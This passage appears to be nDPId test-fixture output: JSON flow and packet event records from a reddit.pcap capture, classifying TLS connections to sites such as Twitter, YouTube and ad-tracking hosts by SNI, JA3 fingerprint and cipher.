+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605291687761,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687761,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bcAAAAAoAL9IFSZAAACBAWgBAIIClvEqOkAAAAAAQMDBw=="} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2609,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605291687790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687790,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs9EqAcsBIEmLB5kd7IUo3\/YpAbuAylJzVUg0Stm4oBJXgFBhAAACBAV4AQMDAwQCCArC1z9gW8So6Q=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2610,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1605291687790,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687790,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bhSc1VJgBAB+9RVAAABAQgKW8SpBsLXP2A="} 
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687800,"flow_last_seen":1605291687800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687800,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605291687800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687800,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8MAAAAAoAL9IICJAAACBAWgBAIICk1+jVUAAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605291687829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687829,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dXkT\/jDfEoBJXgChEAAACBAV4AQMDAwQCCArC1z+HTX6NVQ=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1605291687829,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687829,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8SdXV5FgBAB+6w4AAABAQgKTX6NcsLXP4c="} 
+00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687896,"flow_last_seen":1605291687896,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687896,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605291687896,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687896,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetUAAAAAoAL9ICsYAAACBAWgBAIIClOdBf4AAAAAAQMDBw=="} +00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687931,"flow_last_seen":1605291687931,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687931,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605291687931,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687931,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0vYAAAAAoAL9ILpIAAACBAWgBAIICnCSuGYAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2917,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605291687932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687932,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAACJ4z5QqAcsBIEmLB5kd7IUo3\/YpAbuayhO+xPN32HrWoBJXgPVcAAACBAV4AQMDAwQCCArC1z\/tU50F\/g=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2918,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1605291687932,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687932,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetYTvsT0gBAB+3lKAAABAQgKU50GIsLXP+0="} 
+00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687933,"flow_last_seen":1605291687933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605291687933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687933,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6EoAAAAAoAL9IFfFAAACBAWgBAIICteKYnsAAAAAAQMDBw=="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687934,"flow_last_seen":1605291687934,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687934,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605291687934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687934,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJAAAAAAoAL9ICibAAACBAWgBAIIClHJL\/gAAAAAAQMDBw=="} 
+00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2996,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605291687966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687966,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvWTrVWRoTRRdL3oBJXgGFBAAACBAV4AQMDAwQCCArC10AQcJK4Zg=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2997,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1605291687966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687966,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0ve1VkaFgBAB++UvAAABAQgKcJK4icLXQBA="} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605291687974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687974,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYgARaADQAh+RZQSfh\/EI4qAcsBIEmLB5kd7IUo3\/YpAbu+CLYiE5XSRuhLoBJXgDDhAAACBAV4AQMDAwQCCArC10AQ14piew=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3002,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1605291687974,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687974,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACAGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6Eu2IhOWgBAB+7TJAAABAQgK14pipMLXQBA="} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3007,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605291687975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687975,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAABc2hvEqAcsBIEmLB5kd7IUo3\/YpAbus6CNL5ddGO8iRoBJXgMJGAAACBAV4AQMDAwQCCArC10AVUckv+A=="} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3009,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1605291687975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687975,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJEjS+XYgBAB+0YvAAABAQgKUckwIcLXQBU="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}} 
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": 